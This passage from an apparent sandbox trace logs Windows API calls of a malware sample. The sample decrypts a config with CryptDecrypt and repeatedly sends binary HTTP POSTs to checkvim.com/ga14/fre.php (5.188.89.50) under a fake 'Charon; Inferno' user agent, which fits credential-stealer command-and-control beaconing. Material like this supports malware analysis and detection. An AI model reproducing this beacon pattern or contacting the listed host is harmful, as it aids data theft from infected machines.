(lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.231] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0241.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.430] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0241.574] GetProcessHeap () returned 0x840000 [0241.574] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0241.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.575] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0241.576] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.576] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0241.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.578] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0241.578] GetProcessHeap () returned 0x840000 [0241.578] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0241.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.579] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7a0, pdwDataLen=0x19f9a4 | out: pbData=0x87f7a0, pdwDataLen=0x19f9a4) returned 1 [0241.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.626] CryptDestroyKey (hKey=0x87e670) returned 1 [0241.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0241.628] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0241.632] GetProcessHeap () returned 0x840000 [0241.632] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0241.633] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.633] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0241.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.634] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0241.634] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0241.635] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0241.635] GetProcessHeap () returned 0x840000 [0241.635] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0241.639] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0241.779] GetProcessHeap () returned 0x840000 [0241.779] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0241.779] socket (af=2, type=1, protocol=6) returned 0x220 [0241.779] connect (s=0x220, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0241.852] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0241.852] GetProcessHeap () returned 0x840000 [0241.852] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0241.852] GetProcessHeap () returned 0x840000 [0241.852] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0241.853] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0241.854] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0241.854] GetProcessHeap () returned 0x840000 [0241.854] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0241.854] GetProcessHeap () returned 0x840000 [0241.854] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0241.854] GetProcessHeap () returned 0x840000 [0241.854] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0241.854] GetProcessHeap () returned 0x840000 [0241.854] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0241.855] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0241.856] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0241.856] GetProcessHeap () returned 0x840000 [0241.856] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0241.856] GetProcessHeap () returned 0x840000 [0241.856] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0241.856] send (s=0x220, buf=0x873a58*, len=237, flags=0) returned 237 [0241.857] send (s=0x220, buf=0x87eb58*, len=159, flags=0) returned 159 [0241.857] GetProcessHeap () returned 0x840000 [0241.857] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0241.857] recv (in: s=0x220, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0242.219] GetProcessHeap () returned 0x840000 [0242.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0242.219] GetProcessHeap () returned 0x840000 [0242.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0242.219] GetProcessHeap () returned 0x840000 [0242.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0242.219] GetProcessHeap () returned 0x840000 [0242.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0242.219] closesocket (s=0x220) returned 0 [0242.220] GetProcessHeap () returned 0x840000 [0242.220] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0242.220] GetProcessHeap () returned 0x840000 [0242.221] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0242.221] GetProcessHeap () returned 0x840000 [0242.221] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0242.221] GetProcessHeap () returned 0x840000 [0242.222] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0242.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa6c) returned 0x220 [0242.228] Sleep (dwMilliseconds=0xea60) [0242.255] GetProcessHeap () returned 0x840000 [0242.255] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0242.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.256] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0242.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.271] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0242.279] GetProcessHeap () returned 0x840000 [0242.279] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0242.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.280] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e870) returned 1 [0242.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.281] CryptSetKeyParam (hKey=0x87e870, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0242.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.282] CryptSetKeyParam (hKey=0x87e870, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.282] GetProcessHeap () returned 0x840000 [0242.282] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0242.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.283] CryptDecrypt (in: hKey=0x87e870, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0242.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.284] CryptDestroyKey (hKey=0x87e870) returned 1 [0242.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.285] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0242.285] GetProcessHeap () returned 0x840000 [0242.285] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0242.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.286] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.287] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.291] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.295] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.295] GetProcessHeap () returned 0x840000 [0242.295] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0242.295] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0242.296] GetProcessHeap () returned 0x840000 [0242.296] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0242.296] GetProcessHeap () returned 0x840000 [0242.296] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0242.296] GetProcessHeap () returned 0x840000 [0242.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0242.297] GetProcessHeap () returned 0x840000 [0242.297] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fc68 [0242.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.300] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0242.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.305] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0242.311] GetProcessHeap () returned 0x840000 [0242.311] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0242.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.312] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e830) returned 1 [0242.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.313] CryptSetKeyParam (hKey=0x87e830, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0242.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.314] CryptSetKeyParam (hKey=0x87e830, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.314] GetProcessHeap () returned 0x840000 [0242.314] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0242.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.315] CryptDecrypt (in: hKey=0x87e830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fc68, pdwDataLen=0x19f9a4 | out: pbData=0x87fc68, pdwDataLen=0x19f9a4) returned 1 [0242.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.315] CryptDestroyKey (hKey=0x87e830) returned 1 [0242.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.316] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0242.317] GetProcessHeap () returned 0x840000 [0242.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0242.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.317] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0242.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.318] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0242.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.320] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0242.320] GetProcessHeap () returned 0x840000 [0242.320] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8714e8 [0242.320] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0242.322] GetProcessHeap () returned 0x840000 [0242.322] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0242.322] socket (af=2, type=1, protocol=6) returned 0x22c [0242.322] connect (s=0x22c, name=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0242.392] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878aa0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0242.392] GetProcessHeap () returned 0x840000 [0242.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0242.392] GetProcessHeap () returned 0x840000 [0242.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0242.393] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0242.394] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0242.394] GetProcessHeap () returned 0x840000 [0242.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0242.394] GetProcessHeap () returned 0x840000 [0242.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0242.394] GetProcessHeap () returned 0x840000 [0242.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcb0 [0242.394] GetProcessHeap () returned 0x840000 [0242.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0242.394] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0242.395] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0242.395] GetProcessHeap () returned 0x840000 [0242.395] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0242.395] GetProcessHeap () returned 0x840000 [0242.395] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0242.395] send (s=0x22c, buf=0x873a58*, len=237, flags=0) returned 237 [0242.396] send (s=0x22c, buf=0x87eb58*, len=159, flags=0) returned 159 [0242.396] GetProcessHeap () returned 0x840000 [0242.396] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0242.396] recv (in: s=0x22c, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0242.742] closesocket (s=0x22c) returned 0 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0242.742] GetProcessHeap () returned 0x840000 [0242.742] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8714e8 | out: hHeap=0x840000) returned 1 [0242.743] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xa70) returned 0x22c [0242.744] Sleep (dwMilliseconds=0xea60) [0242.745] GetProcessHeap () returned 0x840000 [0242.746] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0242.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.757] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0242.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.762] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0242.769] GetProcessHeap () returned 0x840000 [0242.769] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0242.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.770] CryptImportKey (in: hProv=0x86f248, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5f0) returned 1 [0242.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.771] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0242.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.772] CryptSetKeyParam (hKey=0x87e5f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.772] GetProcessHeap () returned 0x840000 [0242.772] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0242.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.773] CryptDecrypt (in: hKey=0x87e5f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0242.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.774] CryptDestroyKey (hKey=0x87e5f0) returned 1 [0242.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.775] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0242.775] GetProcessHeap () returned 0x840000 [0242.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0242.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.777] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.778] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.779] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0242.780] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.780] GetProcessHeap () returned 0x840000 [0242.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0242.780] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0242.780] GetProcessHeap () returned 0x840000 [0242.780] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0242.780] GetProcessHeap () returned 0x840000 [0242.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0242.781] GetProcessHeap () returned 0x840000 [0242.781] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0242.781] GetProcessHeap () returned 0x840000 [0242.781] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0242.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.781] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0242.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.787] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0242.793] GetProcessHeap () returned 0x840000 [0242.793] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0242.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.794] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0242.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.795] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0242.795] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.795] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.795] GetProcessHeap () returned 0x840000 [0242.796] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0242.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.797] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0242.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0242.798] CryptDestroyKey (hKey=0x87e630) returned 1 [0242.798] LoadLibraryW 